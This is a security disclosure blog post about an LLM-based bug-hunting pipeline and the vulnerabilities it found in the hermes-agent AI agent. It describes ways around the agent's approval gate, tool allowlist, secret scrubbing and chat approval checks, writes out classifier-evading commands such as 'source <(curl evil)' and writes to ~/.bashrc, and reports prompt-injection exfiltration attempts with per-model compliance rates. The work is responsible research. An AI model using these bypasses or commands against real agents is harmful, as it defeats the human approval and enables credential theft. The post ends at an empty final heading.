Disclosure·May 27, 2026·26 min read

We Got Glasswing at Home, and It Found Real Bugs

I wanted Anthropic's Glasswing on hardware I own, so I built it: Lucent, a near-free bug-hunter running a local 27B Qwen on one RTX 3090. Here is the build, the telemetry, and the two real bugs it surfaced in hermes-agent.

By Takyon · Published 2026-05-27
Summary
Anthropic has Glasswing, an autonomous security researcher. I wanted one on hardware I own, so I built Lucent: a staged source-code bug-hunter whose high-volume reading runs on a local 27B Qwen on a single RTX 3090, served by Lucebox at roughly 3.4× decode speed. I pointed it at hermes-agent. A static pass threw up 1,342 hits; the local sweep cut that to 126 candidate findings; a frontier-model adversarial audit triaged 15 leads down to the 2 that are real and in scope. The local reading billed about $1.62. The best moment of the engagement was a reviewer agent catching that I had been scoring three earlier exploits against a threat model the vendor had quietly rewritten.
Two-panel 'we have it at home' meme. Left, captioned GLASSWING: a radiant winged guardian bearing the Anthropic sunburst emblem and a padlock shield. Right, captioned GLASSWING AT HOME: a budget desktop PC with a cracked glass panel duct-taped on as a wing, a glowing GPU, and Linux Tux and 'HACK THE PLANET' stickers.
Anthropic has Glasswing. We have Glasswing at home.

Anthropic has Glasswing: an autonomous security researcher that reads a codebase on its own and comes back with real vulnerabilities. I wanted one too. Not rented by the API call, but running on a machine in the room with me, on models I control and can leave grinding overnight for the price of electricity.

This is how I built that machine, what its own telemetry says it did, and the two real bugs the finished version found the first time I pointed it at a serious target.

The honest headline before the build story: against hermes-agent, a static pass flagged 1,342 candidate sites, the local sweep narrowed those to 126 candidate findings, and an adversarial audit cut them to 15 leads and then to the two bugs worth disclosing. One is an approval prompt that anyone in the chat can answer. The other is also in scope and reported to Nous, but its fix is still landing, so I am holding its details until it ships. The sharpest result of the engagement came from a reviewer agent. Partway through, after I had already "demonstrated" three other exploits, it caught that I had been grading them against a security policy the vendor had replaced six weeks earlier. That correction deleted most of my wins.

The first version was bad

The first attempts were barely automated. I drove a big cloud model, Opus 4.7, by hand against a real target and asked it to find bugs. It produced a confident pile: five findings and a top-ten list, almost all of it false positives and dead ends. The most convincing one was a path traversal in a PDF-extraction routine that could drop a .pth file and turn into code execution at the next Python startup, a clean chain on paper. It fell apart the moment I checked the one thing I should have checked first, whether the upstream library normalizes the filename before it writes. It does. The traversal never reaches disk.

This is the normal failure mode for a model run without checks: high confidence, mostly wrong. A bigger model does not fix it. The bottleneck is discarding bad leads fast enough to keep up, so I stopped working in a chat window and built a pipeline.

Building Lucent

There was an open-source starting point to borrow from, and I did, briefly. It did not do what I needed, and by the time the thing was finding real issues I had rewritten most of it. I call it Lucent.

Lucent is not a conversation. It is a staged pipeline, each stage free to run a different model, with the target's source read-only-mounted inside a locked-down Docker sandbox:

  • Rank. Score every source file for how likely it is to hide a vulnerability, so the expensive stages spend their budget where it matters. On a large tree this is the difference between a run that finishes and one that does not.
  • Hunt. A tiered pool of file-parallel agents reads the ranked files and records leads, each pinned to a file:line and a described mechanism. This is the highest-volume stage, and it runs on the local model.
  • Verify. An adversarial pass re-reads each lead against the source and tries to disprove it: wrong mechanism, not reachable, an artifact of the harness. Nothing advances until it survives this.
  • Exploit. Survivors go to exploit triage and a variant loop that tries to produce a working proof of concept.

Nothing is called a finding until it reaches the top of an evidence ladder: suspicion → static_corroboration → crash_reproduced → root_cause_explained → exploit_demonstrated. The top rung means a script that runs and shows the behavior against a live instance. Everything below that is a lead, and leads are cheap. The verify stage is the one that did the most work, and most of what follows is about why.
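The ladder can be read as an ordered type with a single promotion rule. The sketch below is an illustration under that reading, not Lucent's code: the rung names come from the text, while `Rung`, `promote`, and `is_finding` are hypothetical names.

```python
from enum import IntEnum


class Rung(IntEnum):
    """Evidence ladder from the text, lowest to highest."""
    SUSPICION = 1
    STATIC_CORROBORATION = 2
    CRASH_REPRODUCED = 3
    ROOT_CAUSE_EXPLAINED = 4
    EXPLOIT_DEMONSTRATED = 5


def promote(current: Rung, evidence_ok: bool) -> Rung:
    """Advance exactly one rung, and only when the evidence for it holds."""
    if not evidence_ok or current is Rung.EXPLOIT_DEMONSTRATED:
        return current
    return Rung(current + 1)


def is_finding(rung: Rung) -> bool:
    """Only the top rung counts as a finding; everything below is a lead."""
    return rung is Rung.EXPLOIT_DEMONSTRATED
```

Making the rungs ordered and promotion single-step means a lead cannot jump from suspicion to finding without passing through every check in between.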

The rig: one GPU, a local 27B, Lucebox

The high-volume reading runs on a single RTX 3090. The ranker and the hunters drive a local open Qwen3.6-27B served by Lucebox, which uses speculative decoding: it drafts several tokens ahead and verifies them in a batch, so it commits multiple tokens per step instead of one. On this card, against the 27B at 4-bit, that works out to roughly 3.4× faster generation on code-like text (about 130 tokens per second, against 38 for plain autoregressive decoding), peaking past 4× on the most regular files. That is the difference between a 27B that reads source fast enough to point at a large tree and one that does not. For reference, the speculative-decoding paper this borrows from reports 4–5× on smaller models on a datacenter card; 3.4× on a 27B at 4-bit on a consumer 3090 is the version you can own.
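The draft-then-verify idea can be shown with a toy greedy version. This is a sketch of the general technique, not Lucebox's implementation: `toy_target` and `toy_draft` are made-up stand-ins for the two models, and the inner verification loop stands in for what a real server does in one batched forward pass.

```python
from typing import Callable, List, Tuple

NextToken = Callable[[List[int]], int]


def greedy_decode(target: NextToken, prompt: List[int], n: int) -> List[int]:
    """Plain autoregressive decoding: one target call per committed token."""
    out = list(prompt)
    for _ in range(n):
        out.append(target(out))
    return out[len(prompt):]


def speculative_decode(target: NextToken, draft: NextToken,
                       prompt: List[int], n: int, k: int = 4) -> Tuple[List[int], int]:
    """Draft k tokens, keep the prefix the target agrees with, fix the first miss."""
    out = list(prompt)
    verify_steps = 0
    while len(out) - len(prompt) < n:
        proposal, ctx = [], list(out)
        for _ in range(k):                 # cheap model guesses ahead
            tok = draft(ctx)
            proposal.append(tok)
            ctx.append(tok)
        verify_steps += 1                  # one batched pass in a real server
        ctx = list(out)
        for tok in proposal:
            expected = target(ctx)
            ctx.append(expected)           # always commit the target's token
            if expected != tok:
                break                      # first disagreement ends the step
        else:
            ctx.append(target(ctx))        # all accepted: one bonus token
        out = ctx
    return out[len(prompt):len(prompt) + n], verify_steps


def toy_target(ctx: List[int]) -> int:
    return (ctx[-1] * 3 + 1) % 7


def toy_draft(ctx: List[int]) -> int:
    guess = toy_target(ctx)
    # Hypothetical error pattern: the draft is wrong at every third position.
    return (guess + 1) % 7 if len(ctx) % 3 == 0 else guess
```

The output is identical to plain greedy decoding; only the number of verify steps drops. The quoted figures are consistent with each other: 130 / 38 ≈ 3.4.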

  • 1 RTX 3090: the whole hunting rig
  • 27B: local Qwen, the hunter
  • ~3.4×: Lucebox decode speedup on code
  • 130 tok/s: vs 38 autoregressive
  • $1.62: metered cloud, the local hunt
  • 15 → 2: leads to real bugs
The reading runs on one consumer GPU. A frontier model does the adversarial judgment.

Local does not mean only reading. The ranking, the hunting, and the verify that kills most of the leads all run on that 27B; the model that throws out all but 126 of the 1,342 static hits is the local one. A frontier model, Opus 4.7, sits on top: it orchestrates the run and does the final deep audit of the few survivors, building the proofs and arguing each one down. Each stage is free to run a different model, so that top layer is a choice rather than a floor. It earns its place for one narrow reason: a reviewer that tries to break a finding has to be at least as sharp as whatever built it, or it waves everything through. Everything beneath it stays local, because reading and triaging an 873k-line tree is the work that scales, and metering that by the token is what makes this kind of research expensive.

Ripping out Monty, wiring in Hermes

The pipeline came with an agent loop called Monty, the driver that decides what to read next and how to reason about it. It was rigid where I needed it to improvise, and it fumbled reasoning that spanned several files, so I tore it out and dropped in NousResearch's Hermes Agent, then spent a while tuning it to drive the hunt the way I wanted.

This is worth pausing on. The agent I picked to be the brain of the hunter is the same NousResearch project, hermes-agent, that I would later turn the finished hunter loose on. That was not planned. I chose Hermes because it was the best agent I had on hand, got to know its internals while making it mine, and only afterward pointed the result at the project itself. Knowing a codebase that well, from the inside, is part of why the hunt went where it did.

Weeks of it not working

None of this worked for a long time. The honest version of the timeline is weeks of the pipeline doing something wrong: the ranker burying the interesting files, the hunt stage inventing file:line references that did not exist, the verifier waving through things it should have killed, the whole run wedging because the Lucebox gateway is single-flight and would stall under load and need a restart. A cold sweep of a large tree takes hours, so every bad assumption cost the better part of a day to find.

I fixed them one at a time. I taught the verifier to distrust its own inputs, including files on disk, which mattered more than I expected (more on that below). I made Lucent checkpoint mid-run, so a stall resumes instead of starting over. I added a triage layer that recognizes when a framework or protocol library neutralizes a bug before the dangerous code can run, so those stop being reported as findings at all. Somewhere in there it went from producing confident garbage to producing a short list worth reading.
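Checkpointing of this kind can be as small as a set of finished files written atomically after each one. The sketch below assumes a JSON file and per-file granularity; the function names and the file layout are hypothetical, not Lucent's actual format.

```python
import json
import os
from pathlib import Path
from typing import Callable, Iterable, Set


def load_done(path: Path) -> Set[str]:
    """Return the files already processed, or an empty set on a cold start."""
    if not path.exists():
        return set()
    return set(json.loads(path.read_text()))


def save_done(path: Path, done: Set[str]) -> None:
    """Write to a temp file, then rename, so a crash never leaves a torn file."""
    tmp = path.with_suffix(".tmp")
    tmp.write_text(json.dumps(sorted(done)))
    os.replace(tmp, path)


def run_with_checkpoint(files: Iterable[str], path: Path,
                        process: Callable[[str], object]) -> Set[str]:
    """Process each file once; a rerun skips whatever the checkpoint records."""
    done = load_done(path)
    for name in files:
        if name in done:
            continue
        process(name)          # may raise if the gateway stalls
        done.add(name)
        save_done(path, done)
    return done
```

If `process` raises halfway through, the next call with the same checkpoint path resumes at the first unfinished file instead of starting the sweep over.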

First real target: hermes-agent

hermes-agent is NousResearch's open-source personal agent: a daemon that ingests messages from many channels (Telegram, email, Slack, Matrix, Feishu, and others) and is allowed to run shell commands, write files, execute code, and install "skills" in response to them. The attack surface is the gap between a large set of untrusted-input paths and a large set of privileged actions. The tree is about 873k lines across 2,903 source files, the kind of messy, real codebase I built Lucent to chew on. I read the source and never modified it, and reported what I found to Nous Research.

Static analysis alone flagged 1,342 candidate sites before any model ran: 72 it called critical, 105 high, 1,162 medium, 3 low, and zero verified, because a pattern matcher cannot verify anything. That number is the input to the pipeline, not an output. The ranker pushed the most suspicious files to the top, the hunters read down from there, and the funnel narrowed:

[Figure: triage funnel. 1,342 static hits → 126 candidate findings → 15 triaged leads. Of the 15: 9 dead (false positive · retracted · out of scope), 4 contestable (hardening · latent), 2 in scope (#13 gateway approval, fail-open, High; #14 held until its fix ships).]
The full triage funnel: 1,342 static-analysis hits shed down through 126 candidate findings and 15 leads to the 2 real bugs (finding 13 here; the second held until its fix ships).
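The funnel numbers can be checked with a few lines of arithmetic. The figures below are the ones quoted in the text; the variable and function names are only for illustration.

```python
from typing import List, Tuple

# Severity split of the static pass, as quoted in the text.
severity = {"critical": 72, "high": 105, "medium": 1162, "low": 3}
static_hits = sum(severity.values())

# Stage counts of the funnel, in order.
funnel: List[Tuple[str, int]] = [
    ("static hits", 1342),
    ("candidate findings", 126),
    ("triaged leads", 15),
    ("in scope", 2),
]


def survival_rates(stages: List[Tuple[str, int]]) -> List[Tuple[str, float]]:
    """Fraction of each stage that survives into the next one."""
    return [(name, count / prev)
            for (_, prev), (name, count) in zip(stages, stages[1:])]


for name, rate in survival_rates(funnel):
    print(f"{name}: {rate:.1%} of the previous stage")
```

The severity buckets sum to the 1,342 total, and each stage keeps roughly 9%, 12%, and 13% of the one before it, so about 0.15% of static hits end up as in-scope bugs.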

How the hunt ran

The narrowing from 126 to 15 is the adversarial audit, and it is worth showing its cost because it is the opposite of the local sweep: bounded, frontier-model, and where the real spend is. About 20 specialized agents ran across the engagement: six recon auditors in parallel, each owning one surface (auth, data flow, output); one architect that turned leads into a build plan; six builders that each wrote one runnable proof of concept in its own git worktree; and six reviewer passes whose only job was to tear findings apart. One long-running orchestrator on top. That is roughly 1.5 million tokens across the 13 agents I have clean telemetry for, past 2 million counting recon and orchestration. Individual agents made 20 to 96 tool calls; the builder for the API-server bug alone made 87 before it was satisfied.

It was not a clean afternoon. Two builders died to a harness error mid-run and were recovered from disk and relaunched. The account hit a usage limit partway through, armed an auto-resume, and picked up when the limit reset. The total was about 1h45m of measured agent-compute, but that is a sum, not a wall clock, because the builders and reviewers run in parallel. Leaving that mess out is how a writeup ends up reading like a product demo.

Most leads do not survive

The first sweep produced 126 candidate findings, and almost all of them were wrong. The convincing ones were the problem, the leads that looked solid enough to waste a day on.

The findings run 01–15 in a single sequence across this writeup, so the rows below are not contiguous: this table collects the dead ends, the real-but-out-of-scope behaviors come after it, and the complete list is in the scorecard at the end.

#   What it looked like                    What it actually was
01  env-var exposure in web research       False positive: a grep match, not a real flow
02  marker-pdf extract → .pth RCE chain    Retracted: the library normalizes the filename upstream
03  WhatsApp-bridge path traversal         Retracted: Baileys strips it before the bridge sees it
04  dashboard markdown XSS                 Not exploitable: React and Chromium eat it
05  a cluster of high-sev hits             FP / latent (one nugget foreshadowed the second in-scope finding)
07  vision tool local-file read            Retired: MIME-gated, superseded

Two of those retractions are worth the detail, because they are exactly the bugs you ship if you skip the last check. Finding 02 is the .pth chain from the first version, found again by the pipeline and killed the same way: marker-pdf normalizes the image filename before the vulnerable os.path.join ever sees it, so the function-level primitive is real and the end-to-end path is not. Finding 03 looked like a clean path traversal in the WhatsApp bridge's allow-list. The disproof is four steps deep: the Baileys library calls cleanMessage before the bridge's handler fires, that calls jidNormalizedUser, which for any string lacking an @ (every traversal payload) returns the empty string, and the bridge then falls back to the legitimate chat ID. The traversal string cannot be delivered. It is real at the function level and dead through the real ingress.

A few were real behaviors that fell outside scope:

  • 06, browser_cdp SSRF (real, conditional): a genuine server-side request forgery, but only when the operator configures a non-default DevTools URL.
  • 08, read_file redaction bypass (real, out of scope): a code_file=True flag skips the position-based secret masking, so an opaque value in a .env comes back unredacted. I reproduced the read-side leak. When I then asked a live model to carry the secret out, it declined and flagged the request as data exfiltration. The effective control was the model's judgment, not the redaction logic.
  • 09, framed injection to exfiltration (out of scope): confirmed across models. On the same exfil prompt, GPT-4o complied 5 times out of 6 where Sonnet-4.6 refused all six, which is exactly why model refusal is not a control you can lean on.
[Chart: runs that complied with the same exfil prompt, out of 6. GPT-4o 5/6 · qwen3.6 3/6 · Sonnet-4.6 0/6.]
Compliance on the same exfiltration prompt, by model. Refusal is not a control.

After the first pass nothing was clearly worth reporting, just retractions and a few real-but-out-of-scope behaviors. The danger at that point is the opposite of under-reporting: talking yourself into one of the discarded leads and shipping it anyway.

Three exploits, then a reality check

I focused on the boundaries the vendor itself defines, and three leads reproduced as working proof-of-concepts in the lab.

10. Disabling the shell re-enables it

Inside the execute_code sandbox, a script can call back into a set of sandbox tools. That set is computed as the intersection of the sandbox-eligible tools and the tools the operator enabled. If you enable code_execution but disable terminal, the intersection is empty, and the empty-set case falls back to allowing all tools. Disabling the shell therefore re-enables it, and the model is shown terminal: unavailable while the enforcement layer makes it available.

[Diagram: (sandbox-eligible tools) ∩ (tools you enabled) = ∅, no overlap → fallback: ALLOW ALL. Meanwhile the model is shown "terminal: unavailable".]
Finding 10: an empty tool intersection triggers an allow-all fallback (`code_execution_tool.py:983-984`).

I confirmed this in the container: with terminal disabled, a script executed a command and id returned uid=1000(redteam), real execution as the container user.
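The shape of the bug is easy to reproduce in isolation. This is a sketch of the pattern described above, not the code at `code_execution_tool.py:983-984`: the function names and the example tool sets are hypothetical, and "allow all" is modelled here as "all sandbox-eligible tools".

```python
from typing import Set


def sandbox_tools_fail_open(eligible: Set[str], enabled: Set[str]) -> Set[str]:
    """Buggy pattern: an empty intersection is treated as 'no restriction'."""
    allowed = eligible & enabled
    return allowed if allowed else set(eligible)


def sandbox_tools_fail_closed(eligible: Set[str], enabled: Set[str]) -> Set[str]:
    """Safer pattern: an empty intersection means nothing is callable."""
    return eligible & enabled


# Hypothetical configuration: code execution on, terminal off.
ELIGIBLE = {"terminal"}
ENABLED = {"code_execution"}

print(sandbox_tools_fail_open(ELIGIBLE, ENABLED))    # terminal is back
print(sandbox_tools_fail_closed(ELIGIBLE, ENABLED))  # nothing is allowed
```

The underlying design problem is that "empty" is overloaded: it means both "the operator configured nothing" and "the operator disabled everything eligible", and only the first reading justifies a permissive default.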

11. Secrets reach the scrubbed sandbox

execute_code is documented to strip API keys before running model-written Python, and Nous had already shipped a fix to enforce that. But the stripper checks a skill's declared variables before applying the secret filter, and the only names it rejects are roughly 190 Hermes-branded ones. A skill that declares AWS_SECRET_ACCESS_KEY therefore passes that value into the sandbox, and the agent can author such a skill itself. I confirmed it with synthetic AWS, database, and Stripe canaries: with no skill loaded the child process had all three stripped, and with the skill registered all three arrived intact (code_execution_tool.py:1047, which runs before the secret filter at :1051).
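The ordering problem can be modelled in a few lines. This is a sketch of the behavior as described, not the hermes source: `SECRET_HINTS`, `HERMES_BLOCKED`, and `child_env` are hypothetical, and the single blocked name stands in for the roughly 190 Hermes-branded ones.

```python
from typing import Dict, Set

SECRET_HINTS = ("KEY", "SECRET", "TOKEN", "PASSWORD")  # assumed filter heuristic
HERMES_BLOCKED = {"HERMES_API_KEY"}                    # placeholder for the real list


def child_env(parent: Dict[str, str], skill_declared: Set[str]) -> Dict[str, str]:
    """Build the sandbox environment, with passthrough checked before the filter."""
    out: Dict[str, str] = {}
    for name, value in parent.items():
        # Passthrough runs first, so a declared name never reaches the filter.
        if name in skill_declared and name not in HERMES_BLOCKED:
            out[name] = value
            continue
        if any(hint in name for hint in SECRET_HINTS):
            continue                                   # the secret filter
        out[name] = value
    return out


parent = {"PATH": "/usr/bin", "AWS_SECRET_ACCESS_KEY": "AKIA_CANARY_example"}
print(child_env(parent, skill_declared=set()))
print(child_env(parent, skill_declared={"AWS_SECRET_ACCESS_KEY"}))
```

With no skill loaded the canary is stripped; once a skill declares the variable, the same value arrives in the child intact.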

12. Three approval-gate bypasses

At the default approvals.mode: on, three issues combine. Approvals are remembered by category label rather than by command, so approving rm -rf /tmp/build once authorizes any later rm -rf command. The danger classifier is a fixed regex list, so constructs like source <(curl evil), shred, and mv … /dev/null are not matched. And the file-write and terminal-write deny-lists disagree, so echo … >> ~/.bashrc (or ~/.aws/credentials) passes through the terminal path without a prompt. All three reproduced.
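The first two issues can be reproduced with a toy gate. This is a sketch under stated assumptions: the single regex and the label `recursive_delete` are hypothetical stand-ins for the real classifier list, and `ApprovalGate` is not a hermes class.

```python
import re
from typing import Optional, Set

# Hypothetical one-entry classifier; the real list is longer but also fixed.
DANGER_PATTERNS = {"recursive_delete": re.compile(r"\brm\s+-rf\b")}


def classify(command: str) -> Optional[str]:
    """Return the category label of the first matching pattern, if any."""
    for label, pattern in DANGER_PATTERNS.items():
        if pattern.search(command):
            return label
    return None


class ApprovalGate:
    """Remembers approvals by category label, as finding 12 describes."""

    def __init__(self) -> None:
        self.approved_labels: Set[str] = set()

    def needs_prompt(self, command: str) -> bool:
        label = classify(command)
        if label is None:
            return False                  # unmatched commands never prompt
        return label not in self.approved_labels

    def approve(self, command: str) -> None:
        label = classify(command)
        if label is not None:
            self.approved_labels.add(label)


gate = ApprovalGate()
gate.approve("rm -rf /tmp/build")
print(gate.needs_prompt("rm -rf ~"))                 # same label, no prompt
print(gate.needs_prompt("shred -u ~/.ssh/id_rsa"))   # not in the list, no prompt
```

Keying the memory on the exact command (or a hash of it) would close the first gap; the second is inherent to any fixed deny-list.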

Then the verifier caught something I had missed. With three exploits demonstrated and a writeup underway, it flagged that my scope analysis was reading SECURITY.md from a local checkout. The verify stage fetched the current version from GitHub, diffed it, and the local copy was six weeks stale. Nous had not just tweaked the policy; they had rewritten the threat model from the studs.

"The only security boundary against an adversarial LLM is the operating system. Nothing inside the agent process constitutes containment — not the approval gate, not output redaction, not any pattern scanner, not any tool allowlist."

The rewritten policy is unusually direct, and stating it that plainly is the right posture. It pre-declares whole categories as out of scope: approval-gate bypasses, redaction bypasses, tool-allowlist bypasses, and a shell that stays within its declared posture. Measured against the document that was current, my three exploits collapsed:

  • 12, approval bypasses: out of scope by name. Reclassified as hardening.
  • 11, credential passthrough: the policy documents that skill-declared variables pass through and that the scrub is not a containment boundary. Hardening.
  • 10, the toolset fail-open: survives only as a contestable "this path fails open" argument.

The code still behaves this way and the PoCs still run. What changed is whether the vendor calls it a vulnerability, and mostly it does not. A demonstrated exploit measured against a stale policy ends up as a hardening suggestion. The safeguard that caught this was the verifier I had taught to distrust files on disk. The policy's central claim, that the OS is the only real boundary, also doubles as a map: it names the in-process controls that are not meant to hold. So that is where I looked next.
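The stale-policy check reduces to diffing the local file against a freshly fetched copy and refusing to grade scope if they differ. The sketch below shows only the comparison; fetching the upstream text is left to the caller, `policy_drift` is a hypothetical name, and the two sample strings are placeholders rather than the real policy text.

```python
import difflib
from typing import List


def policy_drift(local_text: str, upstream_text: str) -> List[str]:
    """Return the added and removed lines between the local and upstream policy."""
    diff = list(difflib.unified_diff(
        local_text.splitlines(),
        upstream_text.splitlines(),
        fromfile="local/SECURITY.md",
        tofile="upstream/SECURITY.md",
        lineterm="",
    ))
    # The first two entries are the ---/+++ file headers; skip them.
    return [line for line in diff[2:] if line.startswith(("+", "-"))]


local = "Approval bypasses: in scope\nContact: security team\n"       # placeholder
upstream = "Approval bypasses: out of scope\nContact: security team\n"  # placeholder

drift = policy_drift(local, upstream)
if drift:
    print("Local policy is stale; re-grade scope against upstream:")
    print("\n".join(drift))
```

An empty result means the checkout matches upstream and scope grading can proceed; anything else should block the writeup until the findings are re-scored.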

The in-scope finding (and a latent one)

Working from the current policy, I went after what it still treats as in scope: breaking the OS sandbox, reaching an unauthorized surface, exfiltrating a credential, or code that misrepresents its own behavior. The external chat gateways gave results quickly.

13. Any channel member can approve a dangerous command (in scope, High)

When the agent requests a dangerous action, hermes posts an approval prompt to the chat (Slack buttons, a Matrix reaction, a Feishu card) and blocks until someone responds. Each adapter re-checks who is responding, but only when a caller allow-list is configured. If the allow-list is empty, the check is skipped and any channel member can approve the command. Here is the Slack handler:

# gateway/platforms/slack.py:2499
allowed_csv = os.getenv("SLACK_ALLOWED_USERS", "").strip()
if allowed_csv:                       # empty → the whole check is skipped
    allowed_ids = {u.strip() for u in allowed_csv.split(",") if u.strip()}
    if "*" not in allowed_ids and user_id not in allowed_ids:
        logger.warning("[Slack] Unauthorized approval click by %s — ignoring", user_id)
        return
# …falls through to resolve_gateway_approval(session_key, choice)

This is distinct from the approval-gate bypasses in finding 12. The classifier fires correctly and the prompt is posted as designed; the bug is in who is permitted to answer it, which the policy lists as in scope, word for word: "resolving approvals" by a caller outside the allow-list, plus the explicit line that a code path failing open with no allow-list is a bug in scope. Two details strengthen it. Nous had already fixed the equivalent issue on Telegram, where the adapter fails closed with no list (telegram.py:540-546, with the commit comment "no allowlist means deny by default … fixes #24457"), so one of four adapters was already handled. And Slack's own code comment notes that button clicks bypass the normal message auth flow and must be checked separately, which is the check that is skipped.

The proof drives the real handler functions with a non-allowlisted caller and a genuine pending approval, spying on resolve_gateway_approval:

ADAPTER    ROLE     RESULT
Slack      VULN     FAIL-OPEN (BYPASS)
Matrix     VULN     FAIL-OPEN (BYPASS)
Feishu     VULN     FAIL-OPEN (BYPASS)
Telegram   CONTROL  fail-closed (OK)    _is_callback_user_authorized → False (fixes #24457)

vuln adapters fail-open : ['Slack', 'Matrix', 'Feishu']
control (Telegram) fail-closed: True
BYPASS CONFIRMED

A live variant goes one step further and wakes a real blocked approval waiter: a non-allowlisted attacker clicks approve and the command-approval waiter returns approved=True. It is High on Slack and Matrix, where the fail-open answers an arbitrary dangerous-command prompt, and Medium on Feishu, where it answers a narrower self-update prompt (slack.py:2499, matrix.py:2239, feishu.py:2557).

15. A dashboard XSS that did not reproduce (latent)

The dashboard renders agent-authored message links without a URL-scheme filter, and a separate endpoint returns cleartext API keys to any caller holding the same-origin session token. If a javascript: link rendered as live markup, a poisoned agent message could exfiltrate the operator's keys. I built the full chain (Chromium under Playwright, the actual Markdown.tsx component) and it did not fire. React 19's sanitizeURL rewrites a javascript: href to an inert error string, and Chromium rejects the data: fallback. I tried ten evasion variants; none worked.

This is an honest non-reproduction. It is still a weak point: the component relies on React and the browser to enforce the inert-HTML behavior the docs describe rather than enforcing it itself, and there is a live cleartext-credential sink behind it. But it is not exploitable on the versions currently shipped (React 19.2.5). I kept the PoC as a regression test that will fail the day React drops sanitizeURL.

How I know it is real

Every finding here is a script that runs against the real hermes code, read-only-mounted at /opt/hermes in a throwaway container (python:3.12-slim, pinned dependencies, non-root UID 1000, --cap-drop ALL, --security-opt no-new-privileges, --pids-limit 256, --network none where outbound access is not needed), so an in-container bug cannot touch the analysis target. Every planted secret is a canary like AKIA_CANARY_…, so any leak is unmistakable and harmless.
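The container settings listed above map directly onto `docker run` flags. The helper below assembles such a command line as a sketch; the flags and image are the ones named in the text, while `--rm`, the `/poc` mount, and the script path are assumptions added for illustration.

```python
import shlex
from typing import List


def sandbox_argv(src_dir: str, poc_dir: str, script: str,
                 needs_network: bool = False) -> List[str]:
    """Build a docker run command for one PoC against a read-only source mount."""
    argv = [
        "docker", "run", "--rm",                    # --rm: assumed, for 'throwaway'
        "--user", "1000",                           # non-root UID
        "--cap-drop", "ALL",
        "--security-opt", "no-new-privileges",
        "--pids-limit", "256",
        "-v", f"{src_dir}:/opt/hermes:ro",          # analysis target, read-only
        "-v", f"{poc_dir}:/poc:ro",                 # assumed location of the PoCs
    ]
    if not needs_network:
        argv += ["--network", "none"]
    argv += ["python:3.12-slim", "python", f"/poc/{script}"]
    return argv


print(shlex.join(sandbox_argv("/src/hermes-agent", "/src/pocs", "finding13.py")))
```

Building the argument list in one place makes it harder for an individual PoC to run with a looser profile than the rest.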

Each PoC is bracketed by two controls. The positive control: the sibling that handles the case correctly (Telegram for finding 13) must refuse under the same conditions. The negative control: configuring the allow-list must make the handler deny the attacker. A run prints BYPASS CONFIRMED and exits 0 only when the bypass fires and both controls hold; it exits 2 if it does not reproduce, and 3 if a control failed and the result is therefore invalid. That contract is what lets me trust a green run without re-reading 500 lines of someone else's Python. I also exercise each bug in the code directly rather than through a live model, because, as finding 08 showed, a model may decline to use a path that is wide open.
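The exit-code contract is small enough to write down. In this sketch the codes 0, 2, and 3 and the string BYPASS CONFIRMED come from the text; the function name, the other two messages, and the choice to check the controls before the bypass are assumptions.

```python
from typing import Tuple

EXIT_CONFIRMED = 0
EXIT_NOT_REPRODUCED = 2
EXIT_INVALID = 3


def verdict(bypass_fired: bool, positive_control_ok: bool,
            negative_control_ok: bool) -> Tuple[int, str]:
    """Map one PoC run to an exit code and a one-line message."""
    # A failed control invalidates the run regardless of what the bypass did.
    if not (positive_control_ok and negative_control_ok):
        return EXIT_INVALID, "control failed, result invalid"
    if not bypass_fired:
        return EXIT_NOT_REPRODUCED, "not reproduced"
    return EXIT_CONFIRMED, "BYPASS CONFIRMED"


code, message = verdict(bypass_fired=True, positive_control_ok=True,
                        negative_control_ok=True)
print(message)
# A real PoC would finish with sys.exit(code).
```

Checking the controls first means a broken harness can never be mistaken for either a confirmed bug or a clean fix.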

Scorecard

#   What                                    Verdict
01  web-research env exposure               False positive
02  marker-pdf .pth RCE chain               Retracted
03  WhatsApp-bridge path traversal          Retracted
04  dashboard markdown XSS                  Not exploitable
05  cluster of high-sev hits                FP / latent
06  browser_cdp SSRF                        Real, config-conditional
07  vision local-file read                  Retired
08  read_file redaction bypass              Real gap, model-gated, out of scope
09  framed injection → exfil                Real, out of scope
10  execute_code toolset fail-open          Demonstrated, contestable
11  skill credential passthrough            Demonstrated, hardening
12  approval-prompt bypasses                Demonstrated, out of scope
13  gateway approval-resolution fail-open   In scope, High
14  second in-scope finding (held)          In scope; disclosed after fix
15  dashboard inert-render XSS              Latent + regression test

What I filed

Two bugs out of fifteen leads. I reported both to Nous Research through coordinated disclosure, against upstream main at commit b62af47da, with a fix for each. The fix for 13 is the one the vendor has already written once: mirror the Telegram adapter's fail-closed fallback in Slack, Matrix, and Feishu, so an empty allow-list denies by default unless an explicit opt-in flag is set. That is +40/−14 across three files, and it ships with a validation harness that flips the PoC from BYPASS CONFIRMED to not-reproduced once applied. The second in-scope finding went over with its own fix and is still being rolled out, so I am holding its writeup until the patch ships.
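The fail-closed shape looks roughly like this. It is a sketch of the recommended behavior, not the patch itself: `approver_allowed` and `approver_allowed_from_env` are hypothetical names, the opt-in variable `GATEWAY_ALLOW_ALL_USERS` is the one named in the update at the end of this post, and the set of values treated as "on" is an assumption.

```python
import os
from typing import Mapping


def approver_allowed(user_id: str, allowed_csv: str, allow_all: bool) -> bool:
    """Decide whether this user may resolve an approval prompt."""
    allowed = {u.strip() for u in allowed_csv.split(",") if u.strip()}
    if not allowed:
        # Empty allow-list: deny unless the operator explicitly opted in.
        return allow_all
    return "*" in allowed or user_id in allowed


def approver_allowed_from_env(user_id: str,
                              env: Mapping[str, str] = os.environ) -> bool:
    """Same check, reading the Slack allow-list and the opt-in flag from env."""
    opt_in = env.get("GATEWAY_ALLOW_ALL_USERS", "").strip().lower()
    return approver_allowed(
        user_id,
        env.get("SLACK_ALLOWED_USERS", ""),
        allow_all=opt_in in {"1", "true", "yes"},   # assumed truthy values
    )


print(approver_allowed("U_ATTACKER", "", allow_all=False))
```

The difference from the vulnerable handler is a single branch: the empty allow-list case now has an explicit answer instead of skipping the check.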

The rest is a hardening list, not advisories: the toolset fail-open (10), the credential passthrough (11), and the approval-gate gaps (12) are all real code behaviors the current policy declines to call vulnerabilities, and they are welcome as pull requests. The most useful non-code thing is documentation: 15 shows a component trusting React and the browser to enforce a security stance the component should enforce itself, with a cleartext-credential endpoint waiting behind it.

What it cost, and what that means

